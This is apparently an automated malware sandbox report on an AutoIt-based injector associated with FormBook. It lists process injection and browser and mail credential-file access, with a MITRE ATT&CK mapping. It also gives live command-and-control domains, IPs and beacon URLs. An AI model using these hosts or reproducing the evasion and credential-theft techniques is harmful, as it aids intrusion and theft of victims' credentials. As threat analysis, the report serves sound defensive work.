                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003EA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003F71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: qbSIgCrCgw.exe, WafZCahkNS.exe, 00000004.00000002.3900197008.00000000014F0000.00000002.00000001.00040000.00000000.sdmp, WafZCahkNS.exe, 00000004.00000000.1589036985.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000000.1745156629.0000000000D91000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: WafZCahkNS.exe, 00000004.00000002.3900197008.00000000014F0000.00000002.00000001.00040000.00000000.sdmp, WafZCahkNS.exe, 00000004.00000000.1589036985.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000000.1745156629.0000000000D91000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: WafZCahkNS.exe, 00000004.00000002.3900197008.00000000014F0000.00000002.00000001.00040000.00000000.sdmp, WafZCahkNS.exe, 00000004.00000000.1589036985.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000000.1745156629.0000000000D91000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
                Source: qbSIgCrCgw.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: WafZCahkNS.exe, 00000004.00000002.3900197008.00000000014F0000.00000002.00000001.00040000.00000000.sdmp, WafZCahkNS.exe, 00000004.00000000.1589036985.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000000.1745156629.0000000000D91000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003D65C4 cpuid
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_0040091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_0042B340 GetUserNameW
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003E1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003CDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
                Source: qbSIgCrCgw.exe, 00000000.00000003.1432082615.0000000000FC5000.00000004.00000020.00020000.00000000.sdmp, qbSIgCrCgw.exe, 00000000.00000003.1432178200.000000000103C000.00000004.00000020.00020000.00000000.sdmp, qbSIgCrCgw.exe, 00000000.00000002.1445241515.000000000103C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procmon.exe

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000008.00000002.3900807992.0000000002280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3898728526.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1668607265.00000000033A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3898911867.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1668177200.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3899007570.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1669021668.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3900792299.0000000004940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\mobsync.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: qbSIgCrCgw.exe | Binary or memory string: WIN_81
                Source: qbSIgCrCgw.exe | Binary or memory string: WIN_XP
                Source: qbSIgCrCgw.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: qbSIgCrCgw.exe | Binary or memory string: WIN_XPe
                Source: qbSIgCrCgw.exe | Binary or memory string: WIN_VISTA
                Source: qbSIgCrCgw.exe | Binary or memory string: WIN_7
                Source: qbSIgCrCgw.exe | Binary or memory string: WIN_8

                Remote Access Functionality

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000008.00000002.3900807992.0000000002280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3898728526.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1668607265.00000000033A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3898911867.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1668177200.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3899007570.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1669021668.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3900792299.0000000004940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_00408C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_0040923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                MITRE ATT&CK Matrix (one line per tactic column; techniques matched by this analysis carry their count in parentheses, the remaining cells are the unmatched matrix entries):

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: Native API (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
                Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
                Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (261); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: Ingress Tool Transfer (5); Encrypted Channel (1); Non-Application Layer Protocol (5); Application Layer Protocol (5); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                Behavior Graph (ID: 1589092, Sample: qbSIgCrCgw.exe, Startdate: 11/01/2025, Architecture: WINDOWS, Score: 100), recovered from the graph data as a process chain:

                • Start: DNS/IP contacts www.tals.xyz, www.logidant.xyz and 18 other IPs or domains; signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 4 other signatures. www.logidant.xyz: Performs DNS queries to domains with low reputation.
                • qbSIgCrCgw.exe (started): Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; 2 other signatures.
                • svchost.exe (started by qbSIgCrCgw.exe): Maps a DLL or memory area into another process.
                • WafZCahkNS.exe (injected by svchost.exe): Found direct / indirect Syscall (likely to bypass EDR).
                • mobsync.exe (started by WafZCahkNS.exe): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures.
                • WafZCahkNS.exe (injected by mobsync.exe) and firefox.exe (started by mobsync.exe).
                • Network contacts of the injected WafZCahkNS.exe: logidant.xyz 45.141.156.114 (ports 49928, 49944, 49964; YURTEH-ASUA, Germany); www.canadavinreport.site 185.27.134.206 (ports 49737, 49756, 49774; WILDCARD-ASWildcardUKLimitedGB, United Kingdom); 11 other IPs or domains; signature: Found direct / indirect Syscall (likely to bypass EDR).

                Source | Detection | Scanner | Label
                qbSIgCrCgw.exe | 75% | ReversingLabs | Win32.Trojan.AutoitInject
                qbSIgCrCgw.exe | 68% | Virustotal |
                qbSIgCrCgw.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.brightvision.website
                203.161.42.73
                truefalse
                  unknown
                  www.madhf.tech
                  103.224.182.242
                  truefalse
                    high
                    r0lqcud7.nbnnn.xyz
                    202.79.161.151
                    truefalse
                      high
                      logidant.xyz
                      45.141.156.114
                      truefalse
                        high
                        www.zkdamdjj.shop
                        188.114.97.3
                        truefalse
                          high
                          www.airrelax.shop
                          172.67.215.235
                          truefalse
                            high
                            www.canadavinreport.site
                            185.27.134.206
                            truefalse
                              high
                              www.izmirescortg.xyz
                              172.67.186.192
                              truefalse
                                high
                                cstrategy.online
                                194.76.119.60
                                truefalse
                                  unknown
                                  fap-a13f5c64.faipod.com
                                  165.154.96.210
                                  truefalse
                                    unknown
                                    www.tals.xyz
                                    13.248.169.48
                                    truefalse
                                      high
                                      bloodbalancecaps.shop
                                      108.179.253.197
                                      truefalse
                                        unknown
                                        aballanet.cat
                                        134.0.14.158
                                        truefalse
                                          unknown
                                          www.logidant.xyz
                                          unknown
                                          unknownfalse
                                            high
                                            www.cstrategy.online
                                            unknown
                                            unknownfalse
                                              unknown
                                              www.bloodbalancecaps.shop
                                              unknown
                                              unknownfalse
                                                unknown
                                                www.laohub10.net
                                                unknown
                                                unknownfalse
                                                  high
                                                  www.aballanet.cat
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    www.yunlekeji.top
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.canadavinreport.site/g3h7/?DzLTc=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRvMsWNScFLLtPX2xNM4zETNmxHASFhTRGutFERc3E41rkQ==&m8=urJ0WtmP0FPTTBfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.canadavinreport.site/g3h7/false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.madhf.tech/0mwe/?DzLTc=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN45JDeb7ji4WvSMSl4p5VjB9j7uxKBUhToKF7GDp/0AaWeg==&m8=urJ0WtmP0FPTTBtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.airrelax.shop/an34/?m8=urJ0WtmP0FPTTB&DzLTc=CNTdLyZz4y5GtyaihT4QjOii4vbhvEXfI6qLlcD2dwDay6yy3VddH/MIEeXBPGgw7Dla3BC4dxGnjsgYjSxnMH2Hc8XocnANWTB8FhPTbLNabm+q6O9g6Njbhwnq8CC3Yg==false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.zkdamdjj.shop/kf1m/?DzLTc=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXOKBKPZyn2cike7Ub3qNJZbDUNl9s1XUkaYGScVYwZ61FA==&m8=urJ0WtmP0FPTTBfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.tals.xyz/k1td/false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.bloodbalancecaps.shop/r9qi/false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.cstrategy.online/zz3m/?DzLTc=p4da2npHVYx4RJTvd9az3TD7+hR5I2wPXRunqm38WzEuQm6NKJG/l1bLZhOfnTn2NFbWxBmCDQqA3K9Xvzl9TW5cdeUdvoi/F++BAfC2g+APWC2NffnCCUzK9ka60xikyw==&m8=urJ0WtmP0FPTTBfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.izmirescortg.xyz/lnl7/?m8=urJ0WtmP0FPTTB&DzLTc=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA==false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.airrelax.shop/an34/false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.logidant.xyz/iuvu/false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.zkdamdjj.shop/kf1m/false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.cstrategy.online/zz3m/false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.yunlekeji.top/t322/?DzLTc=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR8V86LXkcIGT0dmKE8rYJBtcLljpCBGaC+nO46fC9uxVPg==&m8=urJ0WtmP0FPTTBfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.brightvision.website/gn26/?DzLTc=fgpTVhEuh+HnR3p0lfNLmVuUqPxSLN4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd9MI5QldmEc54Vqz3e9231X82gi2igW+4eDd38X27Ejj4Gw==&m8=urJ0WtmP0FPTTBfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.tals.xyz/k1td/?m8=urJ0WtmP0FPTTB&DzLTc=oEMxw+ab8QlEZmTmAbDEuuFmAVWx5xMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCTHyrYyRaD0W2SHbUYxhUJeAm2Jm3PlTqYYqojkKZ3lrXmQ==false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.laohub10.net/36be/?m8=urJ0WtmP0FPTTB&DzLTc=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rC5vzNz0ZFCw8d/R3+K3cKRBUeMTJLe+XGej8HjBlTXN1Q==false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.aballanet.cat/6xrr/?DzLTc=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&m8=urJ0WtmP0FPTTBfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.aballanet.cat/6xrr/false
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.laohub10.net/36be/false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.brightvision.website/gn26/false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.logidant.xyz/iuvu/?DzLTc=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yne0LzqH+H8Nzlr/8TCrRqA4T6hsg8YSRhr2x7F+rJ6nzbiw==&m8=urJ0WtmP0FPTTBfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.madhf.tech/0mwe/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.yunlekeji.top/t322/false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      http://www.madhf.tech/0mwe/?DzLTc=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdYWafZCahkNS.exe, 00000008.00000002.3901668653.0000000002F48000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://duckduckgo.com/chrome_newtabmobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.cstrategy.online/zz3m/?DzLTc=p4da2npHVYx4RJTvd9az3TD7mobsync.exe, 00000006.00000002.3901773244.000000000656A000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003D6A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://duckduckgo.com/ac/?q=mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://securepubads.g.doubleclick.net/tag/js/gpt.jsmobsync.exe, 00000006.00000002.3904569653.0000000007820000.00000004.00000800.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3901773244.00000000063D8000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003BD8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            high
                                                            http://www.litespeedtech.com/error-pagemobsync.exe, 00000006.00000002.3901773244.0000000005424000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000002C24000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1965350475.0000000000BD4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                              high
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.canadavinreport.site/g3h7/?DzLTc=dyqWmobsync.exe, 00000006.00000002.3901773244.00000000058DA000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.00000000030DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.ecosia.org/newtab/mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ac.ecosia.org/autocomplete?q=mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://keyq.top/$WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003BD8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://playchill.top/api/axgames/request?domain=$mobsync.exe, 00000006.00000002.3904569653.0000000007820000.00000004.00000800.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3901773244.00000000063D8000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003BD8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        high
                                                                        http://aballanet.cat/6xrr/?DzLTc=HxJAUmNG5amobsync.exe, 00000006.00000002.3901773244.00000000055B6000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000002DB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.bloodbalancecaps.shopWafZCahkNS.exe, 00000008.00000002.3900807992.00000000022D2000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssmobsync.exe, 00000006.00000002.3901773244.0000000006246000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003A46000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              45.141.156.114
                                                                              logidant.xyzGermany
                                                                              30860YURTEH-ASUAfalse
                                                                              165.154.96.210
                                                                              fap-a13f5c64.faipod.comCanada
                                                                              7456INTERHOPCAfalse
                                                                              13.248.169.48
                                                                              www.tals.xyzUnited States
                                                                              16509AMAZON-02USfalse
                                                                              103.224.182.242
                                                                              www.madhf.techAustralia
                                                                              133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                                              134.0.14.158
                                                                              aballanet.catSpain
                                                                              197712CDMONsistemescdmoncomESfalse
                                                                              172.67.215.235
                                                                              www.airrelax.shopUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              188.114.97.3
                                                                              www.zkdamdjj.shopEuropean Union
                                                                              13335CLOUDFLARENETUSfalse
                                                                              203.161.42.73
                                                                              www.brightvision.websiteMalaysia
                                                                              45899VNPT-AS-VNVNPTCorpVNfalse
                                                                              108.179.253.197
                                                                              bloodbalancecaps.shopUnited States
                                                                              46606UNIFIEDLAYER-AS-1USfalse
                                                                              194.76.119.60
                                                                              cstrategy.onlineItaly
                                                                              202675KELIWEBITfalse
                                                                              185.27.134.206
                                                                              www.canadavinreport.siteUnited Kingdom
                                                                              34119WILDCARD-ASWildcardUKLimitedGBfalse
                                                                              172.67.186.192
                                                                              www.izmirescortg.xyzUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              202.79.161.151
                                                                              r0lqcud7.nbnnn.xyzSingapore
                                                                              64050BCPL-SGBGPNETGlobalASNSGfalse
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1589092
Start date and time: 2025-01-11 09:25:32 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: qbSIgCrCgw.exe (renamed because the original name is a hash value)
Original Sample Name: bb04679008a1ac6bcd8ca7ff7470e0ee72450562fd87be1e0b8111f0e7ef2d76.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@14/13
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 48
• Number of non-executed functions: 297
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded the maximum time and may have missing disassembly code information.
• Report size exceeded the maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time: 03:27:30 | Type: API Interceptor | Description: 11058163x Sleep call for process: mobsync.exe modified
                                                                              • www.lovel.shop/rxts/
                                                                              PGK60fNNCZ.exeGet hashmaliciousFormBookBrowse
                                                                              • www.aktmarket.xyz/wb7v/
                                                                              02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • www.remedies.pro/a42x/
                                                                              zAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                                              • www.aktmarket.xyz/wb7v/
                                                                              SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                                              • www.sfantulandrei.info/wvsm/
                                                                              suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                              • www.optimismbank.xyz/98j3/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.madhf.tech
    02Eh1ah35H.exe | malicious | FormBook, GuLoader | 103.224.182.242
    suBpo1g13Q.exe | malicious | FormBook | 103.224.182.242
    AxKxwW9WGa.exe | malicious | FormBook | 103.224.182.242
